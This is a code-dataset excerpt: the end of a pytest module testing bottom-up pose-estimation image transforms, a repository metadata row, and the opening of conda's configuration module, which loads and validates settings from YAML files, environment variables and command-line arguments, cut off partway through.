0, 2, 1, 4, 3, 6, 5, 8, 7, 10, 9, 12, 11, 14, 13, 16, 15
]
ann_info['use_different_joint_weights'] = False
ann_info['joint_weights'] = np.array([
1., 1., 1., 1., 1., 1., 1., 1.2, 1.2, 1.5, 1.5, 1., 1., 1.2, 1.2, 1.5,
1.5
],
dtype=np.float32).reshape((17, 1))
ann_info['image_size'] = np.array(512)
ann_info['heatmap_size'] = np.array([128, 256])
ann_info['num_joints'] = 17
ann_info['num_scales'] = 2
ann_info['scale_aware_sigma'] = False
ann_ids = coco.getAnnIds(785)
anno = coco.loadAnns(ann_ids)
mask = _get_mask(coco, anno, 785)
anno = [
obj for obj in anno if obj['iscrowd'] == 0 or obj['num_keypoints'] > 0
]
joints = _get_joints(anno, ann_info, False)
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['image_file'] = osp.join(data_prefix, '000000000785.jpg')
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
transform = LoadImageFromFile()
results = transform(copy.deepcopy(results))
assert results['img'].shape == (425, 640, 3)
# test HorizontalFlip
random_horizontal_flip = BottomUpRandomFlip(flip_prob=1.)
results_horizontal_flip = random_horizontal_flip(copy.deepcopy(results))
assert _check_flip(results['img'], results_horizontal_flip['img'])
random_horizontal_flip = BottomUpRandomFlip(flip_prob=0.)
results_horizontal_flip = random_horizontal_flip(copy.deepcopy(results))
assert (results['img'] == results_horizontal_flip['img']).all()
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_horizontal_flip(
copy.deepcopy(results_copy))
# test TopDownAffine
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'short', 0)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'short',
40)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
results_copy = copy.deepcopy(results)
results_copy['ann_info']['scale_aware_sigma'] = True
joints = _get_joints(anno, results_copy['ann_info'], False)
results_copy['joints'] = \
[joints.copy() for _ in range(results_copy['ann_info']['num_scales'])]
results_affine_transform = random_affine_transform(results_copy)
assert results_affine_transform['img'].shape == (512, 512, 3)
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[0]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['joints'] = joints_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
results_copy = copy.deepcopy(results)
results_copy['mask'] = mask_list[:1]
with pytest.raises(AssertionError):
results_horizontal_flip = random_affine_transform(
copy.deepcopy(results_copy))
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5], 'long', 40)
results_affine_transform = random_affine_transform(copy.deepcopy(results))
assert results_affine_transform['img'].shape == (512, 512, 3)
with pytest.raises(ValueError):
random_affine_transform = BottomUpRandomAffine(30, [0.75, 1.5],
'short-long', 40)
results_affine_transform = random_affine_transform(
copy.deepcopy(results))
# test BottomUpGenerateTarget
generate_multi_target = BottomUpGenerateTarget(2, 30)
results_generate_multi_target = generate_multi_target(
copy.deepcopy(results))
assert 'targets' in results_generate_multi_target
assert len(results_generate_multi_target['targets']
) == results['ann_info']['num_scales']
# test BottomUpGetImgSize when W > H
get_multi_scale_size = BottomUpGetImgSize([1])
results_get_multi_scale_size = get_multi_scale_size(copy.deepcopy(results))
assert 'test_scale_factor' in results_get_multi_scale_size['ann_info']
assert 'base_size' in results_get_multi_scale_size['ann_info']
assert 'center' in results_get_multi_scale_size['ann_info']
assert 'scale' in results_get_multi_scale_size['ann_info']
assert results_get_multi_scale_size['ann_info']['base_size'][1] == 512
# test BottomUpResizeAlign
transforms = [
dict(type='ToTensor'),
dict(
type='NormalizeTensor',
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]
resize_align_multi_scale = BottomUpResizeAlign(transforms=transforms)
results_copy = copy.deepcopy(results_get_multi_scale_size)
results_resize_align_multi_scale = resize_align_multi_scale(results_copy)
assert 'aug_data' in results_resize_align_multi_scale['ann_info']
# test BottomUpGetImgSize when W < H
results_copy = copy.deepcopy(results)
results_copy['img'] = np.random.rand(640, 425, 3)
results_get_multi_scale_size = get_multi_scale_size(results_copy)
assert results_get_multi_scale_size['ann_info']['base_size'][0] == 512
def test_BottomUpGenerateHeatmapTarget():
data_prefix = 'tests/data/coco/'
ann_file = osp.join(data_prefix, 'test_coco.json')
coco = COCO(ann_file)
ann_info = {}
ann_info['heatmap_size'] = np.array([128, 256])
ann_info['num_joints'] = 17
ann_info['num_scales'] = 2
ann_info['scale_aware_sigma'] = False
ann_ids = coco.getAnnIds(785)
anno = coco.loadAnns(ann_ids)
mask = _get_mask(coco, anno, 785)
anno = [
obj for obj in anno if obj['iscrowd'] == 0 or obj['num_keypoints'] > 0
]
joints = _get_joints(anno, ann_info, False)
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['image_file'] = osp.join(data_prefix, '000000000785.jpg')
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
generate_heatmap_target = BottomUpGenerateHeatmapTarget(2)
results_generate_heatmap_target = generate_heatmap_target(results)
assert 'target' in results_generate_heatmap_target
assert len(results_generate_heatmap_target['target']
) == results['ann_info']['num_scales']
def test_BottomUpGeneratePAFTarget():
ann_info = {}
ann_info['skeleton'] = [[1, 2], [3, 4]]
ann_info['heatmap_size'] = np.array([5])
ann_info['num_joints'] = 4
ann_info['num_scales'] = 1
mask = np.ones((5, 5), dtype=bool)
joints = np.array([[[1, 1, 2], [3, 3, 2], [0, 0, 0], [0, 0, 0]],
[[1, 3, 2], [3, 1, 2], [0, 0, 0], [0, 0, 0]]])
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
generate_paf_target = BottomUpGeneratePAFTarget(1)
results_generate_paf_target = generate_paf_target(results)
sqrt = np.sqrt(2) / 2
print(results_generate_paf_target['target'])
assert (results_generate_paf_target['target'] == np.array(
[[[sqrt, sqrt, 0, sqrt, sqrt], [sqrt, sqrt, sqrt, sqrt, sqrt],
[0, sqrt, sqrt, sqrt, 0], [sqrt, sqrt, sqrt, sqrt, sqrt],
[sqrt, sqrt, 0, sqrt, sqrt]],
[[sqrt, sqrt, 0, -sqrt, -sqrt], [sqrt, sqrt, 0, -sqrt, -sqrt],
[0, 0, 0, 0, 0], [-sqrt, -sqrt, 0, sqrt, sqrt],
[-sqrt, -sqrt, 0, sqrt, sqrt]],
[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]],
dtype=np.float32)).all()
| [
"[email protected]"
]
| |
dc43154b2aa5893cfa927b7f35ef1427d65f1a3b | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/conda_conda/conda-master/conda/common/configuration.py | c1cc2a3d474edce74a64aadc4aa2fa940792cd7f | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 34,143 | py | # -*- coding: utf-8 -*-
"""
A generalized application configuration utility.
Features include:
- lazy eval
- merges configuration files
- parameter type validation, with custom validation
- parameter aliases
Easily extensible to other source formats, e.g. json and ini
Limitations:
- at the moment only supports a "flat" config structure; no nested data structures
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from abc import ABCMeta, abstractmethod
from collections import Mapping, defaultdict
from glob import glob
from itertools import chain
from logging import getLogger
from os import environ, stat
from os.path import basename, join
from stat import S_IFDIR, S_IFMT, S_IFREG
from enum import Enum
from .compat import (isiterable, iteritems, itervalues, odict, primitive_types, string_types,
text_type, with_metaclass)
from .constants import EMPTY_MAP, NULL
from .yaml import yaml_load
from .. import CondaError, CondaMultiError
from .._vendor.auxlib.collection import AttrDict, first, frozendict, last, make_immutable
from .._vendor.auxlib.exceptions import ThisShouldNeverHappenError
from .._vendor.auxlib.path import expand
from .._vendor.auxlib.type_coercion import TypeCoercionError, typify_data_structure
try:
from cytoolz.dicttoolz import merge
from cytoolz.functoolz import excepts
from cytoolz.itertoolz import concat, concatv, unique
except ImportError:
from .._vendor.toolz.dicttoolz import merge
from .._vendor.toolz.functoolz import excepts
from .._vendor.toolz.itertoolz import concat, concatv, unique
try:
from ruamel_yaml.comments import CommentedSeq, CommentedMap
from ruamel_yaml.scanner import ScannerError
except ImportError: # pragma: no cover
from ruamel.yaml.comments import CommentedSeq, CommentedMap # pragma: no cover
from ruamel.yaml.scanner import ScannerError
log = getLogger(__name__)
def pretty_list(iterable, padding=' '): # TODO: move elsewhere in conda.common
if not isiterable(iterable):
iterable = [iterable]
return '\n'.join("%s- %s" % (padding, item) for item in iterable)
def pretty_map(dictionary, padding=' '):
return '\n'.join("%s%s: %s" % (padding, key, value) for key, value in iteritems(dictionary))
class LoadError(CondaError):
def __init__(self, message, filepath, line, column):
self.line = line
self.filepath = filepath
self.column = column
msg = "Load Error: in %s on line %s, column %s. %s" % (filepath, line, column, message)
super(LoadError, self).__init__(msg)
class ConfigurationError(CondaError):
pass
class ValidationError(ConfigurationError):
def __init__(self, parameter_name, parameter_value, source, msg=None, **kwargs):
self.parameter_name = parameter_name
self.parameter_value = parameter_value
self.source = source
super(ConfigurationError, self).__init__(msg, **kwargs)
class MultipleKeysError(ValidationError):
def __init__(self, source, keys, preferred_key):
self.source = source
self.keys = keys
msg = ("Multiple aliased keys in file %s:\n"
"%s"
"Must declare only one. Prefer '%s'" % (source, pretty_list(keys), preferred_key))
super(MultipleKeysError, self).__init__(preferred_key, None, source, msg=msg)
class InvalidTypeError(ValidationError):
def __init__(self, parameter_name, parameter_value, source, wrong_type, valid_types, msg=None):
self.wrong_type = wrong_type
self.valid_types = valid_types
if msg is None:
msg = ("Parameter %s = %r declared in %s has type %s.\n"
"Valid types: %s." % (parameter_name, parameter_value,
source, wrong_type, pretty_list(valid_types)))
super(InvalidTypeError, self).__init__(parameter_name, parameter_value, source, msg=msg)
class InvalidElementTypeError(InvalidTypeError):
def __init__(self, parameter_name, parameter_value, source, wrong_type,
valid_types, index_or_key):
qualifier = "at index" if isinstance(index_or_key, int) else "for key"
msg = ("Parameter %s declared in %s has invalid element %r %s %s.\n"
"Valid element types:\n"
"%s." % (parameter_name, source, parameter_value, qualifier,
index_or_key, pretty_list(valid_types)))
super(InvalidElementTypeError, self).__init__(parameter_name, parameter_value, source,
wrong_type, valid_types, msg=msg)
class CustomValidationError(ValidationError):
def __init__(self, parameter_name, parameter_value, source, custom_message):
msg = ("Parameter %s = %r declared in %s is invalid.\n"
"%s" % (parameter_name, parameter_value, source, custom_message))
super(CustomValidationError, self).__init__(parameter_name, parameter_value, source,
msg=msg)
class MultiValidationError(CondaMultiError, ConfigurationError):
def __init__(self, errors, *args, **kwargs):
super(MultiValidationError, self).__init__(errors, *args, **kwargs)
def raise_errors(errors):
if not errors:
return True
elif len(errors) == 1:
raise errors[0]
else:
raise MultiValidationError(errors)
class ParameterFlag(Enum):
final = 'final'
top = "top"
bottom = "bottom"
def __str__(self):
return "%s" % self.value
@classmethod
def from_name(cls, name):
return cls[name]
@classmethod
def from_value(cls, value):
return cls(value)
@classmethod
def from_string(cls, string):
try:
string = string.strip('!#')
return cls.from_value(string)
except (ValueError, AttributeError):
return None
@with_metaclass(ABCMeta)
class RawParameter(object):
def __init__(self, source, key, raw_value):
self.source = source
self.key = key
self._raw_value = raw_value
def __repr__(self):
return text_type(vars(self))
@abstractmethod
def value(self, parameter_obj):
raise NotImplementedError()
@abstractmethod
def keyflag(self):
raise NotImplementedError()
@abstractmethod
def valueflags(self, parameter_obj):
raise NotImplementedError()
@classmethod
def make_raw_parameters(cls, source, from_map):
if from_map:
return dict((key, cls(source, key, from_map[key])) for key in from_map)
return EMPTY_MAP
class EnvRawParameter(RawParameter):
source = 'envvars'
def value(self, parameter_obj):
if hasattr(parameter_obj, 'string_delimiter'):
string_delimiter = getattr(parameter_obj, 'string_delimiter')
# TODO: add stripping of !important, !top, and !bottom
raw_value = self._raw_value
if string_delimiter in raw_value:
value = raw_value.split(string_delimiter)
else:
value = [raw_value]
return tuple(v.strip() for v in value)
else:
return self.__important_split_value[0].strip()
def keyflag(self):
return ParameterFlag.final if len(self.__important_split_value) >= 2 else None
def valueflags(self, parameter_obj):
if hasattr(parameter_obj, 'string_delimiter'):
string_delimiter = getattr(parameter_obj, 'string_delimiter')
# TODO: add stripping of !important, !top, and !bottom
return tuple('' for _ in self._raw_value.split(string_delimiter))
else:
return self.__important_split_value[0].strip()
@property
def __important_split_value(self):
return self._raw_value.split("!important")
@classmethod
def make_raw_parameters(cls, appname):
keystart = "{0}_".format(appname.upper())
raw_env = dict((k.replace(keystart, '', 1).lower(), v)
for k, v in iteritems(environ) if k.startswith(keystart))
return super(EnvRawParameter, cls).make_raw_parameters(EnvRawParameter.source, raw_env)
class ArgParseRawParameter(RawParameter):
source = 'cmd_line'
def value(self, parameter_obj):
return make_immutable(self._raw_value)
def keyflag(self):
return None
def valueflags(self, parameter_obj):
return None if isinstance(parameter_obj, PrimitiveParameter) else ()
@classmethod
def make_raw_parameters(cls, args_from_argparse):
return super(ArgParseRawParameter, cls).make_raw_parameters(ArgParseRawParameter.source,
args_from_argparse)
class YamlRawParameter(RawParameter):
# this class should encapsulate all direct use of ruamel.yaml in this module
def __init__(self, source, key, raw_value, keycomment):
self._keycomment = keycomment
super(YamlRawParameter, self).__init__(source, key, raw_value)
def value(self, parameter_obj):
self.__process(parameter_obj)
return self._value
def keyflag(self):
return ParameterFlag.from_string(self._keycomment)
def valueflags(self, parameter_obj):
self.__process(parameter_obj)
return self._valueflags
def __process(self, parameter_obj):
if hasattr(self, '_value'):
return
elif isinstance(self._raw_value, CommentedSeq):
valuecomments = self._get_yaml_list_comments(self._raw_value)
self._valueflags = tuple(ParameterFlag.from_string(s) for s in valuecomments)
self._value = tuple(self._raw_value)
elif isinstance(self._raw_value, CommentedMap):
valuecomments = self._get_yaml_map_comments(self._raw_value)
self._valueflags = dict((k, ParameterFlag.from_string(v))
for k, v in iteritems(valuecomments) if v is not None)
self._value = frozendict(self._raw_value)
elif isinstance(self._raw_value, primitive_types):
self._valueflags = None
self._value = self._raw_value
else:
raise ThisShouldNeverHappenError() # pragma: no cover
@staticmethod
def _get_yaml_key_comment(commented_dict, key):
try:
return commented_dict.ca.items[key][2].value.strip()
except (AttributeError, KeyError):
return None
@staticmethod
def _get_yaml_list_comments(value):
items = value.ca.items
raw_comment_lines = tuple(excepts((AttributeError, KeyError, TypeError),
lambda q: items.get(q)[0].value.strip() or None,
lambda _: None # default value on exception
)(q)
for q in range(len(value)))
return raw_comment_lines
@staticmethod
def _get_yaml_map_comments(rawvalue):
return dict((key, excepts(KeyError,
lambda k: rawvalue.ca.items[k][2].value.strip() or None,
lambda _: None # default value on exception
)(key))
for key in rawvalue)
@classmethod
def make_raw_parameters(cls, source, from_map):
if from_map:
return dict((key, cls(source, key, from_map[key],
cls._get_yaml_key_comment(from_map, key)))
for key in from_map)
return EMPTY_MAP
@classmethod
def make_raw_parameters_from_file(cls, filepath):
with open(filepath, 'r') as fh:
try:
ruamel_yaml = yaml_load(fh)
except ScannerError as err:
mark = err.problem_mark
raise LoadError("Invalid YAML", filepath, mark.line, mark.column)
return cls.make_raw_parameters(filepath, ruamel_yaml) or EMPTY_MAP
def load_file_configs(search_path):
# returns an ordered map of filepath and dict of raw parameter objects
def _file_yaml_loader(fullpath):
assert fullpath.endswith((".yml", ".yaml")) or "condarc" in basename(fullpath), fullpath
yield fullpath, YamlRawParameter.make_raw_parameters_from_file(fullpath)
def _dir_yaml_loader(fullpath):
for filepath in sorted(concatv(glob(join(fullpath, "*.yml")),
glob(join(fullpath, "*.yaml")))):
yield filepath, YamlRawParameter.make_raw_parameters_from_file(filepath)
# map a stat result to a file loader or a directory loader
_loader = {
S_IFREG: _file_yaml_loader,
S_IFDIR: _dir_yaml_loader,
}
def _get_st_mode(path):
# stat the path for file type, or None if path doesn't exist
try:
return S_IFMT(stat(path).st_mode)
except OSError:
return None
expanded_paths = tuple(expand(path) for path in search_path)
stat_paths = (_get_st_mode(path) for path in expanded_paths)
load_paths = (_loader[st_mode](path)
for path, st_mode in zip(expanded_paths, stat_paths)
if st_mode is not None)
raw_data = odict(kv for kv in chain.from_iterable(load_paths))
return raw_data
@with_metaclass(ABCMeta)
class Parameter(object):
_type = None
_element_type = None
def __init__(self, default, aliases=(), validation=None):
self._name = None
self._names = None
self.default = default
self.aliases = aliases
self._validation = validation
def _set_name(self, name):
# this is an explicit method, and not a descriptor/setter
# it's meant to be called by the Configuration metaclass
self._name = name
self._names = frozenset(x for x in chain(self.aliases, (name, )))
return name
@property
def name(self):
if self._name is None:
# The Configuration metaclass should call the `_set_name` method.
raise ThisShouldNeverHappenError() # pragma: no cover
return self._name
@property
def names(self):
if self._names is None:
# The Configuration metaclass should call the `_set_name` method.
raise ThisShouldNeverHappenError() # pragma: no cover
return self._names
def _raw_parameters_from_single_source(self, raw_parameters):
# while supporting parameter name aliases, we enforce that only one definition is given
# per data source
keys = self.names & frozenset(raw_parameters.keys())
matches = {key: raw_parameters[key] for key in keys}
numkeys = len(keys)
if numkeys == 0:
return None, None
elif numkeys == 1:
return next(itervalues(matches)), None
elif self.name in keys:
return matches[self.name], MultipleKeysError(raw_parameters[next(iter(keys))].source,
keys, self.name)
else:
return None, MultipleKeysError(raw_parameters[next(iter(keys))].source,
keys, self.name)
def _get_all_matches(self, instance):
# a match is a raw parameter instance
matches = []
multikey_exceptions = []
for filepath, raw_parameters in iteritems(instance.raw_data):
match, error = self._raw_parameters_from_single_source(raw_parameters)
if match is not None:
matches.append(match)
if error:
multikey_exceptions.append(error)
return matches, multikey_exceptions
@abstractmethod
def _merge(self, matches):
raise NotImplementedError()
def __get__(self, instance, instance_type):
# strategy is "extract and merge," which is actually just map and reduce
# extract matches from each source in SEARCH_PATH
# then merge matches together
if self.name in instance._cache_:
return instance._cache_[self.name]
matches, errors = self._get_all_matches(instance)
try:
result = typify_data_structure(self._merge(matches) if matches else self.default,
self._element_type)
except TypeCoercionError as e:
errors.append(CustomValidationError(self.name, e.value, "<<merged>>", text_type(e)))
else:
errors.extend(self.collect_errors(instance, result))
raise_errors(errors)
instance._cache_[self.name] = result
return result
def collect_errors(self, instance, value, source="<<merged>>"):
"""Validate a Parameter value.
Args:
instance (Configuration): The instance object to which the Parameter descriptor is
attached.
value: The value to be validated.
"""
errors = []
if not isinstance(value, self._type):
errors.append(InvalidTypeError(self.name, value, source, type(value),
self._type))
elif self._validation is not None:
result = self._validation(value)
if result is False:
errors.append(ValidationError(self.name, value, source))
elif isinstance(result, string_types):
errors.append(CustomValidationError(self.name, value, source, result))
return errors
def _match_key_is_important(self, raw_parameter):
return raw_parameter.keyflag() is ParameterFlag.final
def _first_important_matches(self, matches):
idx = first(enumerate(matches), lambda x: self._match_key_is_important(x[1]),
apply=lambda x: x[0])
return matches if idx is None else matches[:idx+1]
@staticmethod
def _str_format_flag(flag):
return " #!%s" % flag if flag is not None else ''
@staticmethod
def _str_format_value(value):
if value is None:
return 'None'
return value
@classmethod
def repr_raw(cls, raw_parameter):
raise NotImplementedError()
class PrimitiveParameter(Parameter):
"""Parameter type for a Configuration class that holds a single python primitive value.
The python primitive types are str, int, float, complex, bool, and NoneType. In addition,
python 2 has long and unicode types.
"""
def __init__(self, default, aliases=(), validation=None, parameter_type=None):
"""
Args:
default (Any): The parameter's default value.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value. Returning
`None` also indicates a valid value.
parameter_type (type or Tuple[type]): Type-validation of parameter's value. If None,
type(default) is used.
"""
self._type = type(default) if parameter_type is None else parameter_type
self._element_type = self._type
super(PrimitiveParameter, self).__init__(default, aliases, validation)
def _merge(self, matches):
important_match = first(matches, self._match_key_is_important, default=None)
if important_match is not None:
return important_match.value(self)
last_match = last(matches, lambda x: x is not None, default=None)
if last_match is not None:
return last_match.value(self)
raise ThisShouldNeverHappenError() # pragma: no cover
def repr_raw(self, raw_parameter):
return "%s: %s%s" % (raw_parameter.key,
self._str_format_value(raw_parameter.value(self)),
self._str_format_flag(raw_parameter.keyflag()))
class SequenceParameter(Parameter):
"""Parameter type for a Configuration class that holds a sequence (i.e. list) of python
primitive values.
"""
_type = tuple
def __init__(self, element_type, default=(), aliases=(), validation=None,
string_delimiter=','):
"""
Args:
element_type (type or Iterable[type]): The generic type of each element in
the sequence.
default (Iterable[str]): The parameter's default value.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value.
"""
self._element_type = element_type
self.string_delimiter = string_delimiter
super(SequenceParameter, self).__init__(default, aliases, validation)
def collect_errors(self, instance, value, source="<<merged>>"):
errors = super(SequenceParameter, self).collect_errors(instance, value)
element_type = self._element_type
for idx, element in enumerate(value):
if not isinstance(element, element_type):
errors.append(InvalidElementTypeError(self.name, element, source,
type(element), element_type, idx))
return errors
def _merge(self, matches):
# get matches up to and including first important_match
# but if no important_match, then all matches are important_matches
relevant_matches = self._first_important_matches(matches)
# get individual lines from important_matches that were marked important
# these will be prepended to the final result
def get_marked_lines(match, marker, parameter_obj):
return tuple(line
for line, flag in zip(match.value(parameter_obj),
match.valueflags(parameter_obj))
if flag is marker) if match else ()
top_lines = concat(get_marked_lines(m, ParameterFlag.top, self) for m in relevant_matches)
# also get lines that were marked as bottom, but reverse the match order so that lines
# coming earlier will ultimately be last
bottom_lines = concat(get_marked_lines(m, ParameterFlag.bottom, self) for m in
reversed(relevant_matches))
# now, concat all lines, while reversing the matches
# reverse because elements closer to the end of search path take precedence
all_lines = concat(m.value(self) for m in reversed(relevant_matches))
# stack top_lines + all_lines, then de-dupe
top_deduped = tuple(unique(concatv(top_lines, all_lines)))
# take the top-deduped lines, reverse them, and concat with reversed bottom_lines
# this gives us the reverse of the order we want, but almost there
# NOTE: for a line value marked both top and bottom, the bottom marker will win out
# for the top marker to win out, we'd need one additional de-dupe step
bottom_deduped = unique(concatv(reversed(tuple(bottom_lines)), reversed(top_deduped)))
# just reverse, and we're good to go
return tuple(reversed(tuple(bottom_deduped)))
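    # Illustrative note (editor's addition, values are hypothetical): with two
    # sources A = ['x', 'y  #!top'] and B = ['y', 'z  #!bottom'], where B sits
    # later in the search path, the merge above yields ('y', 'x', 'z') --
    # 'y' is pulled to the front by its top flag, the ordinary line 'x'
    # follows, and 'z' sinks to the end because of its bottom flag.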
def repr_raw(self, raw_parameter):
lines = list()
lines.append("%s:%s" % (raw_parameter.key,
self._str_format_flag(raw_parameter.keyflag())))
for q, value in enumerate(raw_parameter.value(self)):
valueflag = raw_parameter.valueflags(self)[q]
lines.append(" - %s%s" % (self._str_format_value(value),
self._str_format_flag(valueflag)))
return '\n'.join(lines)
def _get_all_matches(self, instance):
# this is necessary to handle argparse `action="append"`, which can't be set to a
# default value of NULL
matches, multikey_exceptions = super(SequenceParameter, self)._get_all_matches(instance)
matches = tuple(m for m in matches if m._raw_value is not None)
return matches, multikey_exceptions
class MapParameter(Parameter):
"""Parameter type for a Configuration class that holds a map (i.e. dict) of python
primitive values.
"""
_type = dict
def __init__(self, element_type, default=None, aliases=(), validation=None):
"""
Args:
element_type (type or Iterable[type]): The generic type of each element.
default (Mapping): The parameter's default value. If None, will be an empty dict.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value.
"""
self._element_type = element_type
super(MapParameter, self).__init__(default or dict(), aliases, validation)
def collect_errors(self, instance, value, source="<<merged>>"):
errors = super(MapParameter, self).collect_errors(instance, value)
if isinstance(value, Mapping):
element_type = self._element_type
errors.extend(InvalidElementTypeError(self.name, val, source, type(val),
element_type, key)
for key, val in iteritems(value) if not isinstance(val, element_type))
return errors
def _merge(self, matches):
# get matches up to and including first important_match
# but if no important_match, then all matches are important_matches
relevant_matches = self._first_important_matches(matches)
# mapkeys with important matches
def key_is_important(match, key):
return match.valueflags(self).get(key) is ParameterFlag.final
important_maps = tuple(dict((k, v)
for k, v in iteritems(match.value(self))
if key_is_important(match, k))
for match in relevant_matches)
# dump all matches in a dict
# then overwrite with important matches
return merge(concatv((m.value(self) for m in relevant_matches),
reversed(important_maps)))
def repr_raw(self, raw_parameter):
lines = list()
lines.append("%s:%s" % (raw_parameter.key,
self._str_format_flag(raw_parameter.keyflag())))
for valuekey, value in iteritems(raw_parameter.value(self)):
valueflag = raw_parameter.valueflags(self).get(valuekey)
lines.append(" %s: %s%s" % (valuekey, self._str_format_value(value),
self._str_format_flag(valueflag)))
return '\n'.join(lines)
class ConfigurationType(type):
"""metaclass for Configuration"""
def __init__(cls, name, bases, attr):
super(ConfigurationType, cls).__init__(name, bases, attr)
# call _set_name for each parameter
cls.parameter_names = tuple(p._set_name(name) for name, p in iteritems(cls.__dict__)
if isinstance(p, Parameter))
@with_metaclass(ConfigurationType)
class Configuration(object):
def __init__(self, search_path=(), app_name=None, argparse_args=None):
self.raw_data = odict()
self._cache_ = dict()
self._reset_callbacks = set() # TODO: make this a boltons ordered set
self._validation_errors = defaultdict(list)
if not hasattr(self, '_search_path') and search_path is not None:
# we only set search_path once; we never change it
self._search_path = search_path
if not hasattr(self, '_app_name') and app_name is not None:
# we only set app_name once; we never change it
self._app_name = app_name
self._set_search_path(search_path)
self._set_env_vars(app_name)
self._set_argparse_args(argparse_args)
def _set_search_path(self, search_path):
if not hasattr(self, '_search_path') and search_path is not None:
# we only set search_path once; we never change it
self._search_path = search_path
if getattr(self, '_search_path', None):
# we need to make sure old data doesn't stick around if we are resetting
# easiest solution is to completely clear raw_data and re-load other sources
# if raw_data holds contents
raw_data_held_contents = bool(self.raw_data)
if raw_data_held_contents:
self.raw_data = odict()
self._set_raw_data(load_file_configs(search_path))
if raw_data_held_contents:
# this should only be triggered on re-initialization / reset
self._set_env_vars(getattr(self, '_app_name', None))
self._set_argparse_args(self._argparse_args)
self._reset_cache()
return self
def _set_env_vars(self, app_name=None):
if not hasattr(self, '_app_name') and app_name is not None:
# we only set app_name once; we never change it
self._app_name = app_name
if getattr(self, '_app_name', None):
erp = EnvRawParameter
self.raw_data[erp.source] = erp.make_raw_parameters(self._app_name)
self._reset_cache()
return self
def _set_argparse_args(self, argparse_args):
# the argparse_args we store internally in this class as self._argparse_args
# will be a mapping type, not a non-`dict` object like argparse_args is natively
if hasattr(argparse_args, '__dict__'):
# the argparse_args from argparse will be an object with a __dict__ attribute
# and not a mapping type like this method will turn it into
self._argparse_args = AttrDict((k, v) for k, v, in iteritems(vars(argparse_args))
if v is not NULL)
elif not argparse_args:
# argparse_args can be initialized as `None`
self._argparse_args = AttrDict()
else:
# we're calling this method with argparse_args that are a mapping type, likely
# already having been processed by this method before
self._argparse_args = AttrDict((k, v) for k, v, in iteritems(argparse_args)
if v is not NULL)
source = ArgParseRawParameter.source
self.raw_data[source] = ArgParseRawParameter.make_raw_parameters(self._argparse_args)
self._reset_cache()
return self
def _set_raw_data(self, raw_data):
self.raw_data.update(raw_data)
self._reset_cache()
return self
def _reset_cache(self):
self._cache_ = dict()
for callback in self._reset_callbacks:
callback()
return self
def register_reset_callaback(self, callback):
self._reset_callbacks.add(callback)
def check_source(self, source):
# this method ends up duplicating much of the logic of Parameter.__get__
# I haven't yet found a way to make it more DRY though
typed_values = {}
validation_errors = []
raw_parameters = self.raw_data[source]
for key in self.parameter_names:
parameter = self.__class__.__dict__[key]
match, multikey_error = parameter._raw_parameters_from_single_source(raw_parameters)
if multikey_error:
validation_errors.append(multikey_error)
if match is not None:
try:
typed_value = typify_data_structure(match.value(parameter),
parameter._element_type)
except TypeCoercionError as e:
validation_errors.append(CustomValidationError(match.key, e.value,
match.source, text_type(e)))
else:
collected_errors = parameter.collect_errors(self, typed_value, match.source)
if collected_errors:
validation_errors.extend(collected_errors)
else:
typed_values[match.key] = typed_value # parameter.repr_raw(match)
else:
# this situation will happen if there is a multikey_error and none of the
